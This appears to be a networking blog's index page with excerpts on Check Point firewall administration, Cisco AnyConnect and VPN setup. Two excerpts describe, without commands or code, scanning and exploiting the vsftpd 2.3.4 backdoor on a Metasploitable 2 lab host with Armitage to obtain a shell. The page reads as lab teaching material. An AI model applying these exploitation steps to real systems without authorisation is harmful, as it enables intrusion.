Skip to main content

Posts

Checkpoint Logs – Previously the Magical Smart Tracker!

The Smart Tracker lovers who prefer to have a separate window for checking logs.. you are in for a disappointment!! There is no separate Smart Tracker utility in Smart Console as Checkpoint R80.x boasts of a Unified Work pane and configuration wizard. It is handled by the “Logs and Monitoring” tab as below: The desired traffic log can be filtered as it was done earlier: Right-click on the source / destination / Origin (Gateway) / Application. Below the filter is being applied on: Source = 198.51.100.193 and Destination = 198.51.100.193 The filter can be defined by selecting the IP address or service port as below. Happy troubleshooting!!

Metasploit - Exploiting vsftpd vulnerability

Let us exploit try the below exploit.. Disclaimer: I did an intense NMAP scan for FTP port and did a couple of trial and errors before figuring out that the port 21 has the “vstfpd_234_backdoor” vulnerability that can be exploited: Exploiting Unix “vstfpd_234_backdoor” vulnerability of Metasploitable 2 using  Armitage. The end result being, the exploited host now presents its shell prompt via which we were able to create our own directory.

Metasploit - Scanning vulnerable systems

Open Armitage from the Kali Linux “Applications” pane – the lady with green hair, as below: Click “Connect” and “OK” for the below prompts: Ignore the below prompts: Enter the target IP of which the vulnerability needs to be exploited. This seems to be a mandatory window, as no matter how many times I click “Cancel” this window continues to pop up. Run the nmap scan as below to find the list of hosts active on a network: A small excerpt of the scan is as follows.. The list of active responding PCs will be discovered in the right window.. My vulnerable host is 192.168.1.111 (Metasploitable host) List of open ports on this host based on the nmap scan: We will exploit a vulnerability in the next post..

Cisco Anyconnect VPN client

You might have come across a problem with your end users using Cisco AnyConnect client wherein, the user continues using that old VPN profile which you replaced with a new one, simply because he still sees the old profile populated there and doesn't want any trouble of entering the new one!!!   The Cisco Anyconnect VPN client usually stores its cache i.e. the list of all the VPN profiles, it has ever used, in the “preferences.xml” file located below: C:\Users\<Username> \AppData\Local\Cisco\Cisco AnyConnect Secure Mobility Client The preferences.xml file, apart from the client certificate should show all the settings that have been changed from the default such as “Block Untrusted Servers”, “Allow local LAN access” etc. The xml file should look like below: Deleting the “preferences.xml” file should delete the cache and revert the client to its default settings, with that old profile vanishing from the end user's client cache, right away!

Checkpoint R80.10 IPSEC VPN Configuration - Part 2

Continuing from Part 1.. (Apparently, I was too drowsy to paste the pictures in that article, last night :)) 6. Multiple Entry Points (MEPs) 7. Excluded Services : Select services that shouldn’t be encrypted over the tunnel: 8. Enter and enable PSK 9. Wired Mode: Usually kept at default 10. Define the renegotiation timers for phase 1 and phase 2 in Advanced tab:

Checkpoint R80.10 - Upgrade using Blink Utility

The year is 2018. The war between the Checkpoint community across the world and Checkpoint Software Technologies Ltd. regarding the future of Checkpoint R77.30, is in full swing. The general consensus of the Checkpoint community to extend R77.30 support timeline (from the current May 2019) seems to be falling on deaf ears!! In a desperate attempt to make hay while the sun is still shining, administrators seem to be moving towards R80.10, as soon as possible. To ease things a bit, Checkpoint has created a "Blink" Utility.  Here is how it works (Make sure that you read the constraints at the bottom of this article): You have newly ordered a Checkpoint Security Gateway* for eg. CP 4600. It came with a default image R77.30, which need to be upgraded to R80.10, without going through the hassles of clean install (May be because, you do NOT want to rely on the on-site technician, or because there is no Internet connectivity (hence no online CPUSE), or because you just want to te...

Checkpoint - Exporting Objects in CSV format

Be it a Network Operations Manager, Security Architect or a Security Auditor, the people up the hierarchy always harangue the Security Engineers to compile the list of firewall objects or rules or policies or the traffic statistics and so on.. This can turn out to be quite hectic especially if there are no built in features to systematically provide the output in a "layman-readable" format. Come, Checkpoint's "Object Explorer..."  which not only provides the output in the "layman-readable" format, but also provides in-built filtering mechanisms, thereby ensuring that the Security Engineer doesn't have to rely on Google for building his scarce Microsoft Excel data filtering skills. The following screenshots will show how easy it is, with Checkpoint R80.10 to generate the firewall configuration inventory. On the SmartConsole Unified Portal, navigate to Menu >> Open Object Explorer... Select the Categories you wish to see in your output: Click o...